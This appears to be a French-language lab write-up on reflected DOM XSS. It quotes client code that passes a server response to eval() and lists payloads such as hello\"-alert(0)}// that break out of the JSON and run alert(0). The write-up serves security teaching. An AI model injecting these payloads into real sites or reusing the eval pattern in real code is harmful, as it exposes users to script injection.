XSS DOM réfléchi

Reflected DOM XSS

Lab: Reflected DOM XSS | Web Security AcademyWebSecAcademy

Ce laboratoire montre une vulnérabilité DOM réfléchie. Les données envoyées dans la requête sont renvoyées par le serveur, puis un script côté client les traite de manière dangereuse et les écrit dans un eval, ouvrant la porte à une exécution de code.

Le client effectue une requête AJAX vers path + window.location.search. Quand la réponse arrive, le code fait :

function search(path) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            eval('var searchResultsObj = ' + this.responseText);
            displaySearchResults(searchResultsObj);
        }
    };
    xhr.open("GET", path + window.location.search);
    xhr.send();

    function displaySearchResults(searchResultsObj) {
        var blogHeader = document.getElementsByClassName("blog-header")[0];
        var blogList = document.getElementsByClassName("blog-list")[0];
        var searchTerm = searchResultsObj.searchTerm
        var searchResults = searchResultsObj.results

        var h1 = document.createElement("h1");
        h1.innerText = searchResults.length + " search results for '" + searchTerm + "'";
        blogHeader.appendChild(h1);
        var hr = document.createElement("hr");
        blogHeader.appendChild(hr)

        for (var i = 0; i < searchResults.length; ++i)
        {
            var searchResult = searchResults[i];
            if (searchResult.id) {
                var blogLink = document.createElement("a");
                blogLink.setAttribute("href", "/post?postId=" + searchResult.id);

                if (searchResult.headerImage) {
                    var headerImage = document.createElement("img");
                    headerImage.setAttribute("src", "/image/" + searchResult.headerImage);
                    blogLink.appendChild(headerImage);
                }

                blogList.appendChild(blogLink);
            }

            blogList.innerHTML += "<br/>";

            if (searchResult.title) {
                var title = document.createElement("h2");
                title.innerText = searchResult.title;
                blogList.appendChild(title);
            }

            if (searchResult.summary) {
                var summary = document.createElement("p");
                summary.innerText = searchResult.summary;
                blogList.appendChild(summary);
            }

            if (searchResult.id) {
                var viewPostButton = document.createElement("a");
                viewPostButton.setAttribute("class", "button is-small");
                viewPostButton.setAttribute("href", "/post?postId=" + searchResult.id);
                viewPostButton.innerText = "View post";
            }
        }

        var linkback = document.createElement("div");
        linkback.setAttribute("class", "is-linkback");
        var backToBlog = document.createElement("a");
        backToBlog.setAttribute("href", "/");
        backToBlog.innerText = "Back to Blog";
        linkback.appendChild(backToBlog);
        blogList.appendChild(linkback);
    }
}

La fonction displaySearchResults parcourt searchResultsObj et crée dynamiquement des éléments (h1, h2, p, a, img, etc.), en affectant innerText pour les titres et résumés mais en important searchResultsObj via eval.

if (this.readyState == 4 && this.status == 200) {
            eval('var searchResultsObj = ' + this.responseText);
            displaySearchResults(searchResultsObj);
        }

eval() - JavaScript | MDNMDN Web Docs

L'utilisation de eval('var searchResultsObj = ' + this.responseText) est critique : si la réponse contrôlée contient du texte spécialement formé, il est possible de casser la syntaxe attendue et d'injecter du code JavaScript qui sera exécuté lors de l'évaluation.

Faire renvoyer (ou intercepter) responseText contenant la valeur attaquante pour searchTerm ou un champ similaire.
Sortir de la chaîne/le littéral JSON attendu en fermant la structure et en ajoutant du code exécutable, puis neutraliser le reste avec un commentaire (//) pour éviter des erreurs de syntaxe ultérieures.

Exemples de payloads testés

(ces chaînes sont destinées à être placées dans la partie de la réponse reflétée — elles montrent comment sortir de la structure et exécuter alert(0))

hello\"jordan

hello\"jordan}//

En injectant une des chaînes ci-dessus dans la portion réfléchie de la réponse, l'eval interprétera la construction modifiée et exécutera alert(0), démontrant l'exécution de code côté client via DOM XSS réfléchi.

hello\"*alert(0)}//

hello\"+alert(0)}//

hello\"-alert(0)}//

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?